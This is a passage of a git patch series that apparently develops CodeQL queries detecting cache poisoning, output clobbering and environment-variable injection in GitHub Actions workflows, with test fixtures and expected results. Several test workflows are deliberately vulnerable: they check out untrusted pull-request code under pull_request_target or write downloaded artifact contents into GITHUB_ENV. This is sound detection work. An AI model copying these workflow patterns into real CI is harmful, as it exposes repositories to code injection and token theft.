e.isExternallyTriggerable() and // the checkout is not controlled by an access check - not exists(ControlCheck check | check.protects(checkout, j.getATriggerEvent())) and + not exists(ControlCheck check | check.protects(artifact, j.getATriggerEvent())) and ( // the workflow runs in the context of the default branch runsOnDefaultBranch(e) @@ -38,8 +43,7 @@ where ) ) and // the job checkouts untrusted code from a pull request - // TODO: Consider adding artifact downloads as a potential source of cache poisoning - j.getAStep() = checkout and + j.getAStep() = artifact and ( // the job writes to the cache // (No need to follow the checkout step as the cache writing is normally done after the job completes) @@ -49,9 +53,9 @@ where or // the job executes checked-out code // (The cache specific token can be leaked even for non-privileged workflows) - checkout.getAFollowingStep() = s and + artifact.getAFollowingStep() = s and s instanceof PoisonableStep and // excluding privileged workflows since they can be exploited in easier circumstances not j.isPrivileged() ) -select s, checkout, s, "Potential cache poisoning in the context of the default branch" +select s, artifact, s, "Potential cache poisoning in the context of the default branch" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index d17bc34b9ab6..ce8ab4c24dd4 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.21 +version: 0.1.22 groups: [actions, queries] suites: codeql-suites extractor: javascript diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml new file mode 100644 index 000000000000..8f691ed759db --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml @@ -0,0 +1,15 @@ +on: + pull_request_target + +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: artifact + run: | + echo "::set-output name=pr_number::$( Date: Mon, 15 Jul 2024 21:00:54 +0200 Subject: [PATCH 420/707] feat(queries): Experimental Output clobbering query --- .../security/OutputClobberingQuery.qll | 43 +++++++++++++++++++ .../CWE-094/OutputClobberingMedium.ql | 31 +++++++++++++ .../.github/workflows/output_clobbering1.yml | 20 +++++++++ .../.github/workflows/output_clobbering2.yml | 14 ++++++ 4 files changed, 108 insertions(+) create mode 100644 ql/lib/codeql/actions/security/OutputClobberingQuery.qll create mode 100644 ql/src/Security/CWE-094/OutputClobberingMedium.ql create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll new file mode 100644 index 000000000000..f1811ed57625 --- /dev/null +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -0,0 +1,43 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +private import codeql.actions.security.CodeInjectionQuery +private import codeql.actions.security.ArtifactPoisoningQuery +import codeql.actions.dataflow.FlowSources +import codeql.actions.DataFlow + +abstract class OutputClobberingSource extends Step { } + +class RunOutputClobbering extends OutputClobberingSource, Run { + RunOutputClobbering() { + exists(UntrustedArtifactDownloadStep download, string script | + download.getAFollowingStep() = this and + this.getScript() = script and + exists(int i | + script.splitAt("\n", i).matches(["%GITHUB_OUTPUT%", "%::set-output name%"]) and + i < count(string line | line = script.splitAt("\n") | line) - 1 + ) + ) + } +} + +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate a code script. + */ +private module OutputClobberingConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source.asExpr() instanceof OutputClobberingSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } + + predicate isAdditionalFlowStep(DataFlow::Node prev, DataFlow::Node succ) { + exists(StepsExpression e | + e.getTarget() = prev.asExpr() and + prev.asExpr() instanceof OutputClobberingSource and + succ.asExpr() = e + ) + } +} + +/** Tracks flow of unsafe user input that is used to construct and evaluate a code script. */ +module OutputClobberingFlow = TaintTracking::Global; diff --git a/ql/src/Security/CWE-094/OutputClobberingMedium.ql b/ql/src/Security/CWE-094/OutputClobberingMedium.ql new file mode 100644 index 000000000000..7094a7891da1 --- /dev/null +++ b/ql/src/Security/CWE-094/OutputClobberingMedium.ql @@ -0,0 +1,31 @@ +/** + * @name Output Clobbering + * @description A Step output can be clobbered which may allow an attacker to manipulate the expected and trusted values of a variable. + * @kind path-problem + * @problem.severity warning + * @security-severity 5.0 + * @precision medium + * @id actions/output-clobbering/medium + * @tags actions + * security + * external/cwe/cwe-094 + * external/cwe/cwe-095 + * external/cwe/cwe-116 + */ + +import actions +import codeql.actions.security.OutputClobberingQuery +import OutputClobberingFlow::PathGraph + +from OutputClobberingFlow::PathNode source, OutputClobberingFlow::PathNode sink +where + OutputClobberingFlow::flowPath(source, sink) and + inPrivilegedContext(sink.getNode().asExpr()) and + // exclude cases where the sink is a JS script and the expression uses toJson + not exists(UsesStep script | + script.getCallee() = "actions/github-script" and + script.getArgumentExpr("script") = sink.getNode().asExpr() and + exists(getAToJsonReferenceExpression(sink.getNode().asExpr().(Expression).getExpression(), _)) + ) +select sink.getNode(), source, sink, "Potential output clobbering leading to code injection in $@.", + sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml new file mode 100644 index 000000000000..9012eda26492 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml @@ -0,0 +1,20 @@ +# It consumes an artifact produced by the First Workflow + +on: workflow_run +jobs: + my-second-job: + runs-on: ubuntu-latest + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + + - id: version + run: | + echo "version=10" >> "${GITHUB_OUTPUT}" + ls + - run: echo ${{ steps.version.outputs.version }} + diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml new file mode 100644 index 000000000000..e2479e90636d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml @@ -0,0 +1,14 @@ +on: pull_request_target +jobs: + test: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: version + run: | + echo "version=10" >> "${GITHUB_OUTPUT}" + ls + - run: echo ${{ steps.version.outputs.version }} + From 15649afd5c2cfe2e53e0f643da1a62097adcafb3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 22 Jul 2024 12:44:27 +0200 Subject: [PATCH 421/707] feat(queries): Improve envvar injection queries Consider those cases where the contents of a file are written to a var and that var assigned to GITHUB_ENV --- .../security/EnvPathInjectionQuery.qll | 20 ++++++- .../actions/security/EnvVarInjectionQuery.qll | 20 ++++++- .../CWE-077/.github/workflows/test8.yml | 41 ++++++++++++++ .../CWE-077/.github/workflows/test9.yml | 41 ++++++++++++++ .../CWE-077/EnvVarInjectionCritical.expected | 14 +++++ .../CWE-077/EnvVarInjectionMedium.expected | 10 ++++ .../CWE-094/.github/workflows/test11.yml | 56 +++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 21 +++++++ .../CWE-094/CodeInjectionMedium.expected | 19 +++++++ 9 files changed, 240 insertions(+), 2 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 41e72bc83885..ee9f4843470f 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -20,7 +20,25 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and writeToGitHubPath(run, value) and - outputsPartialFileContent(value) + ( + outputsPartialFileContent(value) + or + // e.g. + // FOO=$(cat test-results/sha-number) + // echo "FOO=$FOO" >> $GITHUB_PATH + exists(string line, string var_name, string var_value | + run.getScript().splitAt("\n") = line + | + var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and + var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + outputsPartialFileContent(var_value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + value.matches("$(echo %") and value.indexOf(var_name) > 0 + ) + ) + ) ) } } diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 8dba1a21c908..652b97b887f5 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -22,7 +22,25 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { step.getAFollowingStep() = run and writeToGitHubEnv(run, content) and extractVariableAndValue(content, _, value) and - outputsPartialFileContent(value) + ( + outputsPartialFileContent(value) + or + // e.g. + // FOO=$(cat test-results/sha-number) + // echo "FOO=$FOO" >> $GITHUB_ENV + exists(string line, string var_name, string var_value | + run.getScript().splitAt("\n") = line + | + var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and + var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + outputsPartialFileContent(var_value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + value.matches("$(echo %") and value.indexOf(var_name) > 0 + ) + ) + ) ) } } diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml new file mode 100644 index 000000000000..05bde57551db --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml @@ -0,0 +1,41 @@ +name: Tests + +on: + workflow_run: + workflows: ["tests"] + types: + - completed + +permissions: { contents: read } + +jobs: + unit-test-results: + name: Test + runs-on: ubuntu-latest + permissions: + actions: write + statuses: write + checks: write + pull-requests: write + contents: write + steps: + - uses: actions/checkout@v4 + with: + ref: foo + + - name: Download and Extract Artifacts + uses: dawidd6/action-download-artifact@v6 + with: + run_id: ${{ github.event.workflow_run.id }} + path: ./artifacts + + - name: assignment + run: | + foo=$(cat ./artifacts/parent-artifacts/event.txt) + echo "foo=$foo" >> $GITHUB_ENV + - name: direct 1 + run: | + echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV + - name: direct 2 + run: | + echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml new file mode 100644 index 000000000000..3ed80374ef65 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml @@ -0,0 +1,41 @@ +name: tests + +on: + workflow_run: + workflows: ["Tests"] + types: + - completed + +permissions: { contents: read } + +jobs: + get-artifacts: + name: Get required artifacts + runs-on: ubuntu-latest + permissions: + actions: read + statuses: write + steps: + - name: Download and extract event file + uses: actions/download-artifact@v4 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + run-id: ${{ github.event.workflow_run.id }} + name: event_file + path: artifacts/event_file + + - name: Try to read PR number + id: set-ref + run: | + pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json) + if [ -z "$pr_num" ] || [ "$pr_num" == "null" ]; then + pr_num="" + fi + + ref=$pr_num + if [ -z "$ref" ] || [ "$ref" == "null" ]; then + ref=${{ github.ref }} + fi + + echo "pr_num=$pr_num" >> $GITHUB_ENV + echo "ref=$ref" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 02aed1c05cbb..7d92032f00b7 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -15,6 +15,10 @@ edges | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -48,6 +52,12 @@ nodes | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | | .github/workflows/test7.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test7.yml:16:9:24:35 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | semmle.label | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | subpaths #select | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -66,3 +76,7 @@ subpaths | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | | .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | +| .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index b3da13beda38..2cd369538027 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -15,6 +15,10 @@ edges | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | @@ -48,5 +52,11 @@ nodes | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | | .github/workflows/test7.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test7.yml:16:9:24:35 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:26:9:32:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | semmle.label | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml new file mode 100644 index 000000000000..dc101c769449 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml @@ -0,0 +1,56 @@ +name: tests + +on: + workflow_run: + workflows: ["Tests"] + types: + - completed + +permissions: { contents: read } + +jobs: + get-artifacts: + name: Get required artifacts + runs-on: ubuntu-latest + permissions: + actions: read + statuses: write + outputs: + pr_num: ${{ steps.set-ref.outputs.pr_num }} + ref: ${{ steps.set-ref.outputs.ref }} + steps: + - name: Download and extract event file + uses: actions/download-artifact@v4 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + run-id: ${{ github.event.workflow_run.id }} + name: event_file + path: artifacts/event_file + + - name: Try to read PR number + id: set-ref + run: | + pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json) + if [ -z "$pr_num" ] || [ "$pr_num" == "null" ]; then + pr_num="" + fi + + ref=$pr_num + if [ -z "$ref" ] || [ "$ref" == "null" ]; then + ref=${{ github.ref }} + fi + + echo "pr_num=$pr_num" >> $GITHUB_OUTPUT + echo "ref=$ref" >> $GITHUB_OUTPUT + + test2: + name: test2 + runs-on: ubuntu-latest + needs: get-artifacts + permissions: + actions: read + statuses: write + steps: + - run: echo ${{ needs.get-artifacts.outputs.pr_num }} + - run: echo ${{ needs.get-artifacts.outputs.ref }} + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 3f6fd5310c4b..69085548f69d 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -92,6 +92,15 @@ edges | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | provenance | | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [ref] | .github/workflows/test11.yml:55:20:55:57 | 